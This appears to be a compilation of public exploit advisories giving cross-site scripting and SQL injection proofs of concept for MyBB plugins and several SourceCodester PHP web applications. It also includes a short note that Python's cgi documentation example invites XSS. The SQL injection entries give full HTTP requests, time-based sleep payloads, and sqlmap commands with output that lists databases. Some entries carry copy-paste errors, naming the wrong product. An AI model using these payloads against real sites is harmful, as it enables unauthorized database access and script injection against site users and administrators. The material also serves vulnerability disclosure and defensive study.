<pre><code># Exploit Title: MyBB Export User Plugin 2.0 – Cross-Site Scripting<br /># Date: January 29, 2021<br /># Author: 0xB9<br /># Twitter: @0xB9sec<br /># Software Link: https://community.mybb.com/mods.php?action=view&pid=1408<br /># Version: 2.0<br /># Tested On: Windows 10<br /># CVE: CVE-2023-27890<br /><br />Description:<br />This plugin allows users to request their data to export. XSS occurs when admin is generating data for user.<br /><br />Proof of Concept:<br /><br />– As a regular user go to User CP -> Edit Profile<br />– Add a payload in Custom User Title, Location, or Bio <script>alert(1)</script><br />– Request your data via User CP -> DSGVO data request<br />– Login as admin you will be notified a user wants their data<br />– When generating the users data their payload will execute<br /></code></pre>
<pre><code>Is there low hanging fruit for the following observation?<br /><br />The documentation of the python cgi module is vulnerable to XSS<br />(cross site scripting)<br /><br />https://docs.python.org/3/library/cgi.html<br /><br />```<br />form = cgi.FieldStorage()<br />print("<p>name:", form["name"].value)<br />print("<p>addr:", form["addr"].value)<br />```<br /><br />First result on google for "tutorial python cgi"<br />is https://www.tutorialspoint.com/python/python_cgi_programming.htm<br /><br />And it is almost the same as the python doc.<br /><br />I verified that setting ```name=<script>alert(document.domain)</script>```<br />will trigger dialog, demonstrating javascript is executed<br />on the cgi host.<br /><br />I would expect that devs who read the docs or tutorials will write<br />vulnerable cgis.<br /></code></pre>
<pre><code># Exploit Title: MyBB External Redirect Warning Plugin 1.3 – Cross-Site Scripting<br /># Date: February 1, 2021<br /># Author: 0xB9<br /># Twitter: @0xB9sec<br /># Software Link: https://community.mybb.com/mods.php?action=view&pid=493<br /># Version: 1.3<br /># Tested On: Windows 10<br /># CVE: CVE-2022-28353<br /><br />Description:<br />This plugin notifies the user when they are being redirect to an off-site page. The redirect URL is vulnerable to XSS.<br /><br />Proof of Concept:<br /><br />– Go to the following URL… external.php?url=javascript:alert(1);<br />– Click continue<br />Payload will execute<br /></code></pre>
<pre><code># Exploit Title: MyBB Active Threads Plugin 1.3.0 – Cross-Site Scripting<br /># Date: February 9, 2022<br /># Author: 0xB9<br /># Twitter: @0xB9sec<br /># Software Link: https://community.mybb.com/mods.php?action=view&pid=1336<br /># Version: 1.3.0<br /># Tested On: Windows 10<br /># CVE: CVE-2022-28354<br /><br />Description:<br />This plugin shows a page of active threads. The date parameter is vulnerable to XSS when setting a time period.<br /><br />Proof of Concept:<br />activethreads.php?days=7&hours=0&mins=0&date=”><script>alert(1)</script><br /></code></pre>
<pre><code># Exploit Title: 101+ News Portal - SQLi<br /># Date: 19/03/2023<br /># Exploit Author: Abdulhakim Öner<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html<br /># Software Download: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/101news_0.zip<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /><br />## Description <br />A Blind SQL injection vulnerability in the page (/101news/search.php) in 101+ News Portal allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "searchtitle" parameter. <br /><br />## Request PoC<br />```<br />POST /101news/search.php HTTP/1.1<br />Host: 192.168.1.101<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.101/101news/<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 59<br />Cookie: PHPSESSID=o5fslt60dlojncb7jnft04lps9<br /><br />searchtitle=232943'<br /><br />```<br /><br />This request causes an error. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "searchtitle" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 20 command works. <br /><br />```<br />POST /101news/search.php HTTP/1.1<br />Host: 192.168.1.101<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.101/101news/<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 59<br />Cookie: PHPSESSID=o5fslt60dlojncb7jnft04lps9<br /><br />searchtitle=232943'%2b(select*from(select(sleep(20)))a)%2b'<br /><br />```<br /><br />## Exploit with sqlmap<br />Save the request from burp to file <br />```<br />┌──(root㉿caesar)-[/home/kali/Workstation/multi]<br />└─# sqlmap -r sqli.txt -p 'searchtitle' --batch --dbs --level=3 --risk=2 <br />---snip---<br />POST parameter 'searchtitle' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N<br />sqlmap identified the following injection point(s) with a total of 114 HTTP(s) requests:<br />---<br />Parameter: searchtitle (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: searchtitle=232943' AND 3793=(SELECT (CASE WHEN (3793=3793) THEN 3793 ELSE (SELECT 6168 UNION SELECT 2808) END))-- KdPX<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: searchtitle=232943' AND (SELECT 1460 FROM (SELECT(SLEEP(5)))dqHc)-- zMGY<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 8 columns<br /> Payload: searchtitle=232943' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787071,0x457444695056617478516b4b4f666e73744162466478444e5061624161514f78726c727777764c6b,0x716a6b6271)-- -<br />---<br />[18:01:02] [INFO] the back-end DBMS is MySQL<br />web application technology: PHP 8.2.0, Apache 2.4.54<br />back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<br />[18:01:02] [INFO] fetching database names<br />available databases [5]:<br />[*] information_schema<br />[*] mysql<br />[*] newsportal<br />[*] performance_schema<br />[*] phpmyadmin<br />---snip---<br /><br />```<br /></code></pre>
<pre><code># Exploit Title: Music Gallery Site - Cross Site Scripting Vulnerability (Authenticated)<br /># Date: 19/03/2023<br /># Exploit Author: Abdulhakim Öner<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html<br /># Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-music.zip<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /><br />## Description <br />A reflected Cross Site Scripting vulnerability in the "page" parameter in Online Pizza Ordering System allows remote authenticated users to execute JavaScript code. <br /><br />## Request PoC<br />```<br />GET /php-music/admin/?page=musics63401'%3balert(1)%2f%2f399 HTTP/1.1<br />Host: 192.168.1.101<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.101/php-music/admin/<br />Cookie: PHPSESSID=05o776i4lcn4nm1h48he29gd9b<br /><br />```<br /></code></pre>
<pre><code># Exploit Title: Medicine Tracker System - Cross Site Scripting Vulnerability<br /># Date: 19/03/2023<br /># Exploit Author: Abdulhakim Öner<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/16308/medicine-tracker-system-php-oop-and-mysql-db-source-code-free-download.html<br /># Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /><br />## Description <br />A reflected Cross Site Scripting vulnerability in the "page" parameter in Medicine Tracker System allows to execute JavaScript code. <br /><br />## Request PoC<br />```<br />GET /php-mts/?page=about%3cscript%3ealert(1)%3c%2fscript%3e HTTP/1.1<br />Host: 192.168.1.101<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.101/php-mts/<br />Cookie: PHPSESSID=9gruivatbrq61qio77q3p7j77a<br /><br />```<br /></code></pre>
<pre><code># Exploit Title: Yoga Class Registration System - Cross Site Scripting Vulnerability (Authenticated)<br /># Date: 19/03/2023<br /># Exploit Author: Abdulhakim Öner<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html<br /># Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ycrs.zip<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /><br />## Description <br />A reflected Cross Site Scripting vulnerability in the "page" parameter in Online Pizza Ordering System allows remote authenticated users to execute JavaScript code. <br /><br />## Request PoC<br />```<br />GET /php-ycrs/admin/?page=classes%2fmanage_class58913'%3balert(1)%2f%2f575&id=2 HTTP/1.1<br />Host: 192.168.1.101<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.101/php-ycrs/admin/?page=classes<br />Cookie: PHPSESSID=intlfrkii1gsh9pjgeoo0dhu3b<br /><br />```<br /></code></pre>
<pre><code># Exploit Title: Online Pizza Ordering System 1.0 - "id" SQLi<br /># Date: 19/03/2023<br /># Exploit Author: Abdulhakim Öner<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html<br /># Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /><br />## Description <br />A Blind SQL injection vulnerability in the (/php-opos/index.php) page in Online Pizza Ordering System allows remote unauthenticated attackers to dump database through arbitrary SQL commands by "id" parameter. <br /><br />## Request PoC<br />```<br />GET /php-opos/index.php?page=category&id=1' HTTP/1.1<br />Host: 192.168.1.101<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.101/php-opos/<br />Cookie: PHPSESSID=o1tk08lff329ovpl5mt24tkg20<br /><br />```<br /><br />This request causes a Fatal Error in the webapp. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "id" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 20 command works. <br /><br />```<br />GET /php-opos/index.php?page=category&id=1'%2b(select*from(select(sleep(10)))a)%2b' HTTP/1.1<br />Host: 192.168.1.101<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.101/php-opos/<br />Cookie: PHPSESSID=o1tk08lff329ovpl5mt24tkg20<br /><br />```<br /><br />## Exploit with sqlmap<br />Save the request from burp to file <br />```<br />┌──(root㉿caesar)-[/home/kali/Workstation/php-opos]<br />└─# sqlmap -r sql.txt -p 'id' --batch --dbs --level=3 --risk=2<br />---snip---<br />[13:20:45] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable<br />GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N<br />sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:<br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: page=category&id=1' AND 9957=9957-- dMoW<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: page=category&id=1' AND (SELECT 9683 FROM(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT (ELT(9683=9683,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JUhz<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=category&id=1' AND (SELECT 1462 FROM (SELECT(SLEEP(5)))HRjs)-- mEaq<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 2 columns<br /> Payload: page=category&id=-1987' UNION ALL SELECT NULL,CONCAT(0x717a6b7071,0x79716851566b7072685458534e4c6f7a75784f50614266454c7746646347794d565a43634b684958,0x716a6b7071)-- -<br />---<br />[13:20:45] [INFO] the back-end DBMS is MySQL<br />web application technology: Apache 2.4.54, PHP 8.2.0<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br />[13:20:45] [INFO] fetching database names<br />[13:20:45] [INFO] retrieved: 'information_schema'<br />[13:20:46] [INFO] retrieved: 'mysql'<br />[13:20:46] [INFO] retrieved: 'opos_db'<br />[13:20:46] [INFO] retrieved: 'performance_schema'<br />[13:20:46] [INFO] retrieved: 'phpmyadmin'<br />----snip----<br />```<br /></code></pre>
<pre><code># Exploit Title: Human Resources Management System - HRM - Multiple SQLi<br /># Date: 16/03/2023<br /># Exploit Author: Abdulhakim Öner<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html<br /># Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip<br /># Version: 1.0<br /># Tested on: Windows<br /><br />## Description <br />A Blind SQL injection vulnerability in the login page (/hrm/controller/login.php) in Human Resources Management System allows remote unauthenticated attackers to execute remote command through arbitrary SQL commands by "name" parameter. <br /><br />## Request PoC<br />```<br />POST /hrm/controller/login.php HTTP/1.1<br />Host: 192.168.1.103<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.103/hrm/<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 73<br /><br />name=test@testdomain.com'&password=test&submit=Sign+In<br /><br />```<br /><br />This request causes an error. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "name" parameter, the response to request was 302 status code with message of Found, but 20 seconds later, which indicates that our sleep 20 command works. <br /><br />```<br />POST /hrm/controller/login.php HTTP/1.1<br />Host: 192.168.1.103<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Referer: http://192.168.1.103/hrm/<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 114<br /><br />name=test@testdomain.com'%2b(select*from(select(sleep(20)))a)%2b'&password=test&submit=Sign+In<br /><br />```<br /><br />## Exploit with sqlmap<br />Save the request from burp to file <br />```<br />┌──(root㉿caesar)-[/home/kali/Workstation/hrm]<br />└─# sqlmap -r sqli.txt -p 'name' --batch --dbs --level=3 --risk=2<br />---snip----<br />[15:49:36] [INFO] testing 'MySQL UNION query (89) - 81 to 100 columns'<br />POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N<br />sqlmap identified the following injection point(s) with a total of 838 HTTP(s) requests:<br />---<br />Parameter: name (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: name=test@testdomain.com' AND 3287=(SELECT (CASE WHEN (3287=3287) THEN 3287 ELSE (SELECT 8737 UNION SELECT 2671) END))-- -&password=a5P!s3v!K8&submit=Sign In<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: name=test@testdomain.com' OR (SELECT 6958 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(6958=6958,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VHwA&password=a5P!s3v!K8&submit=Sign In<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: name=test@testdomain.com' AND (SELECT 1760 FROM (SELECT(SLEEP(5)))LTmV)-- fhJt&password=a5P!s3v!K8&submit=Sign In<br />---<br />[15:49:36] [INFO] the back-end DBMS is MySQL<br />web application technology: PHP 8.2.0, Apache 2.4.54, PHP<br />----snip----<br /><br />```<br /><br /><br />## The "password" parameter in the POST request is also vulnerable. It can be exploited in the same way.<br /></code></pre>
